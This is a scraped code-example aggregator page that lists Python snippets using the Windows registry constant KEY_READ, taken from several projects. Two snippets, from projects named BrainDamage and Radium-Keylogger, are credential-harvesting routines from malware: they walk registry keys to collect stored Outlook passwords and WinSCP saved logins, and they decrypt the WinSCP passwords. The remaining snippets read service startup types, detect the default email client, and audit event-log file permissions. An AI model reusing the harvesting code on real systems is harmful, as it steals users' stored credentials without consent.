python类KEY_READ的实例源码

outlook.py 文件源码 项目:BrainDamage 作者: mehulj94 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def run(self):

        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            return

        num = win32api.RegQueryInfoKey(hkey)[0]
        pwdFound = []
        for x in range(0, num):
            name = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

            num_skey = win32api.RegQueryInfoKey(skey)[0]
            if num_skey != 0:
                for y in range(0, num_skey):
                    name_skey = win32api.RegEnumKey(skey, y)
                    sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                    num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                    for z in range(0, num_sskey):
                        k = win32api.RegEnumValue(sskey, z)
                        if 'password' in k[0].lower():
                            values = self.retrieve_info(sskey, name_skey)
                            # write credentials into a text file
                            if len(values) != 0:
                                pwdFound.append(values)

        # print the results
        return pwdFound
services.py 文件源码 项目:jaraco.windows 作者: jaraco 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def infostartup(self):
        self.isuphandle = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, self.sccss + self.sserv, 0, win32con.KEY_READ)
        self.isuptype = win32api.RegQueryValueEx(self.isuphandle, "Start")[0]
        win32api.RegCloseKey(self.isuphandle)
        if self.isuptype == 0:
            return "boot"
        elif self.isuptype == 1:
            return "system"
        elif self.isuptype == 2:
            return "automatic"
        elif self.isuptype == 3:
            return "manual"
        elif self.isuptype == 4:
            return "disabled"
FX_Common.py 文件源码 项目:PyUIA 作者: xiaoxiayu 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def FX_GetDefaultEmailClient():
    key = win32api.RegOpenKey(win32con.HKEY_CLASSES_ROOT, \
                              'mailto\\shell\\open\\command', \
                              0, \
                              win32con.KEY_READ)
    client_str = win32api.RegQueryValue(key, '')
    if client_str.find('OUTLOOK') != -1:
        return 'OUTLOOK'
    return 'FX_UNKNOW'
winscp.py 文件源码 项目:Radium-Keylogger 作者: mehulj94 项目源码 文件源码 阅读 16 收藏 0 点赞 0 评论 0
def get_logins_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
                                      accessRead)
        except Exception, e:
            return False

        num_profiles = win32api.RegQueryInfoKey(key)[0]

        pwdFound = []
        for n in range(num_profiles):
            name_skey = win32api.RegEnumKey(key, n)

            skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
            num = win32api.RegQueryInfoKey(skey)[1]

            port = ''
            values = {}

            for nn in range(num):
                k = win32api.RegEnumValue(skey, nn)

                if k[0] == 'HostName':
                    self.set_hostname(k[1])

                if k[0] == 'UserName':
                    self.set_username(k[1])

                if k[0] == 'Password':
                    self.set_hash(k[1])

                if k[0] == 'PortNumber':
                    port = str(k[1])

            if num != 0:
                if port == '':
                    port = '22'
                try:
                    password = self.decrypt_password()
                    values['Password'] = password
                except Exception, e:
                    pass

                values['Hostname'] = self.get_hostname()
                values['Port'] = port
                values['Username'] = self.get_username()

                pwdFound.append(values)

        # print the results
        return pwdFound
windowsprivcheck.py 文件源码 项目:LHF 作者: blindfuzzy 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def check_event_logs():
    key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
    try:
        keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
    except:
        print "Can't open: " + key_string
        return 0

    subkeys = win32api.RegEnumKeyEx(keyh)
    for subkey in subkeys:
        # print key_string + "\\" + subkey[0]
        sys.stdout.write(".")
        try:
            subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
        except:
            print "Can't open: " + key_string
        else:
            subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
            # print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)

            try:
                filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
            except:
                pass
            else:
                weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
                if weak_perms:
                    # print "------------------------------------------------"
                    # print "Weak permissions found on event log display DLL:"
                    # print_weak_perms("File", weak_perms)
                    sys.stdout.write("!")
                    save_issue("WPC008", "writable_eventlog_dll", weak_perms)

            try:
                filename, type = win32api.RegQueryValueEx(subkeyh, "File")
            except:
                pass
            else:
                weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
                if weak_perms:
                    # print "------------------------------------------------"
                    # print "Weak permissions found on event log file:"
                    # print_weak_perms("File", weak_perms)
                    sys.stdout.write("!")
                    save_issue("WPC007", "writable_eventlog_file", weak_perms)
    print
        #sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
        #print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION)


问题


面经


文章

微信
公众号

扫码关注公众号